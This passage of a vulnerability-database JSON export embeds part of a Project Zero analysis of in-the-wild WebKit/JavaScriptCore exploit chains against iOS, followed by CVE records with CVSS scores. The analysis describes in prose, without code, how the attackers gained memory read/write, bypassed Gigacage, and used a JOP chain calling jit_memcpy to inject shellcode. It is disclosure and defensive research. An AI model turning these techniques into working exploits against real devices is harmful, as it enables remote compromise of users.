ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.\n\n## Exploit 5: iOS 11.4.1\n\nThis exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nDue to the bug, it was possible to construct an Array with a Proxy prototype that wasn\u2019t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.\n\n## Exploit 6: likely iOS 12.0 until 12.1.1\n\nThis exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nIn contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction\u2019s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object\u2019s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). \n \nThis fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.\n\n## Exploit 7: iOS 12.1.1 until 12.1.3\n\nThe final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team flouroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. \n \nInstead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.\n\n## Shellcode Execution\n\nAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function\u2019s JIT code and then invoking that function. \n \nFor some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, \u201chidden\u201d mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a \u201cjit_memcpy\u201d function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. \n \nIn more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the \u201djit_memcpy\u201d function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-29T00:00:00", "type": "googleprojectzero", "title": "\nJSC Exploits\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"], "modified": "2019-08-29T00:00:00", "id": "GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "href": "https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:45:10", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to\n70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a\nsandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-11-14T00:00:00", "type": "ubuntucve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T00:00:00", "id": "UB:CVE-2018-17463", "href": "https://ubuntu.com/security/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:41:32", "description": "A logic issue existed resulting in memory corruption. This was addressed\nwith improved state management. This issue affected versions prior to iOS\n12.1.1, tvOS 12.1.1, watchOS 5.1.2, Safari 12.0.2, iTunes 12.9.2 for\nWindows, iCloud for Windows 7.9.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4438", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2019-04-03T00:00:00", "id": "UB:CVE-2018-4438", "href": "https://ubuntu.com/security/CVE-2018-4438", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:41:18", "description": "Multiple memory corruption issues were addressed with improved memory\nhandling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari\n12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\nmaliciously crafted web content may lead to arbitrary code execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-11T00:00:00", "type": "ubuntucve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2019-04-11T00:00:00", "id": "UB:CVE-2019-8518", "href": "https://ubuntu.com/security/CVE-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:50:59", "description": "An issue was discovered in certain Apple products. iOS before 11.3 is\naffected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is\naffected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is\naffected. watchOS before 4.3 is affected. The issue involves the \"WebKit\"\ncomponent. It allows remote attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and application crash) via a crafted\nweb site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-04-03T00:00:00", "type": "ubuntucve", "title": "CVE-2018-4122", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4122"], "modified": "2018-04-03T00:00:00", "id": "UB:CVE-2018-4122", "href": "https://ubuntu.com/security/CVE-2018-4122", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:59:49", "description": "An issue was discovered in certain Apple products. iOS before 10.3.3 is\naffected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows\nis affected. iTunes before 12.6.2 on Windows is affected. The issue\ninvolves the \"WebKit\" component. It allows attackers to bypass intended\nmemory-read restrictions via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-07-20T00:00:00", "type": "ubuntucve", "title": "CVE-2017-7064", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2017-07-20T00:00:00", "id": "UB:CVE-2017-7064", "href": "https://ubuntu.com/security/CVE-2017-7064", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:01:33", "description": "An issue was discovered in certain Apple products. iOS before 10.3.2 is\naffected. Safari before 10.1.1 is affected. tvOS before 10.2.1 is affected.\nThe issue involves the \"WebKit\" component. It allows remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption and\napplication crash) via a crafted web site.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | webkit receives limited support. For details, see https://wiki.ubuntu.com/SecurityTeam/FAQ#webkit webkit in Ubuntu uses the JavaScriptCore (JSC) engine, not V8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-05-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-2505", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2017-05-22T00:00:00", "id": "UB:CVE-2017-2505", "href": "https://ubuntu.com/security/CVE-2017-2505", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2022-07-09T16:34:28", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-10-09T06:26:34", "type": "redhatcve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2022-07-09T16:31:53", "id": "RH:CVE-2018-17463", "href": "https://access.redhat.com/security/cve/cve-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-07T17:50:14", "description": "Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-03T01:51:43", "type": "redhatcve", "title": "CVE-2019-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2022-07-07T12:14:36", "id": "RH:CVE-2019-8518", "href": "https://access.redhat.com/security/cve/cve-2019-8518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:16:19", "description": "A remote code execution vulnerability exists in Google Chrome V8. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome V8 Remote Code Execution (CVE-2018-17463)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-09-05T00:00:00", "id": "CPAI-2018-1597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:16:59", "description": "A memory corruption vulnerability exists in Apple WebKit. Successful exploitation of this vulnerability could allow attackers to execute code on the target system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-03-16T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Memory Corruption (CVE-2018-4438)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4438"], "modified": "2020-03-16T00:00:00", "id": "CPAI-2018-1319", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:14:04", "description": "A memory corruption vulnerability exists in Apple. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-03T00:00:00", "type": "checkpoint_advisories", "title": "Apple Multiple Products Memory Corruption (CVE-2019-8518)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8518"], "modified": "2020-07-03T00:00:00", "id": "CPAI-2019-2192", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:17:39", "description": "An authentication bypass vulnerability exists in Apple Webkit. Successful exploitation of this vulnerability could allow a remote attacker to gain access to a target system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2020-02-25T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Authentication Bypass (CVE-2017-7064)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7064"], "modified": "2020-02-25T00:00:00", "id": "CPAI-2017-1038", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-09T19:56:17", "description": "A remote code execution vulnerability exists in Apple iOS, tvOS and Safari. Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "checkpoint_advisories", "title": "Apple Webkit Remote Code Execution (CVE-2017-2505)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2505"], "modified": "2020-02-27T00:00:00", "id": "CPAI-2017-1037", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:16", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "type": "debiancve", "title": "CVE-2018-17463", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2018-11-14T15:29:00", "id": "DEBIANCVE:CVE-2018-17463", "href": "https://security-tracker.debian.org/tracker/CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T18:58:03", "description": "A logic issue existed resulting in 